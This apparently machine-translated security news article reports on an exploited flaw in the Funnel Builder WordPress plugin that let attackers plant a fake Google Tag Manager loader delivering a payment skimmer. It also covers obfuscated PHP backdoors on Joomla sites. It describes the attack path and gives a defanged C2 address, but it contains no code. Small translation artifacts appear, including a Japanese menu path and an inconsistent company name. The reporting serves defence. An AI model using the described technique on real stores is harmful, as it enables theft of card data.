A critical security vulnerability affecting the Funnel Builder plugin for WordPress has been exploited to inject malicious JavaScript code into WooCommerce checkout pages with the purpose of stealing payment data.
Details of the activities were announced by Sunsec this week. This vulnerability currently does not have a formal CVE identifier. Affects all versions of the plugin prior to 3.15.0.3. Used by over 40,000 WooCommerce stores.
The flaw allows an unauthenticated attacker to inject arbitrary JavaScript into any checkout page on a store, the Dutch e-commerce security company said. FunnelKit, which manages Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.
“The attacker embeds a fake Google Tag Manager script in the plugin’s ‘external scripts’ settings,” the paper said. “The injected code looks like normal analytics next to the store’s actual tag, but it loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from the checkout.”
According to Sansec, Funnel Builder includes an exposed checkout endpoint that allows you to choose the type of internal method that incoming requests execute. However, older versions were designed not to check the caller’s permissions or restrict which methods were allowed to be called.
A malicious attacker could exploit this loophole by issuing an unauthenticated request that reaches an unspecified internal method that writes attacker-controlled data directly to the plugin’s global configuration. The added code snippet will be inserted into every checkout page in Funnel Builder.
As a result, an attacker could plant a malicious program.
Sansec said that in at least one case, it observed a payload masquerading as a Google Tag Manager (GTM) loader that launched JavaScript hosted on a remote domain. It then opens a WebSocket connection to the attacker’s command and control (C2) server (‘wss://protect-wss’).[.]com/ws”) to obtain a skimmer tailored to the victim’s storefront.
The ultimate goal of the attack is to siphon credit card numbers, CVV, billing addresses, and other personal information that site visitors may enter during checkout. Site owners should update the Funnel Builder plugin to the latest version and[設定]>[チェックアウト]>[外部スクリプト]We recommend that you check if there are any unfamiliar items and delete them.
“Disguising skimmers as Google Analytics or Tag Manager code is a common pattern we see with Magecart, as reviewers tend to just skip over what looks like a familiar tracking tag,” Sansec said.
This disclosure comes weeks after Sucuri detailed a campaign in which Joomla websites were backdoored with highly obfuscated PHP code that contacted attacker-controlled C2 servers, received and processed instructions sent by operators, and served spam content to visitors and search engines without the site owners’ knowledge. The ultimate goal is to capitalize on the reputation of spamming sites.
“The script acts as a remote loader,” said security researcher Puja Srivastava. “It connects to an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site serves.”
“This approach allows an attacker to change the behavior of a compromised website at any time without having to modify local files again. The attacker can insert spam product links, redirect visitors, or dynamically display malicious pages.”
Source link
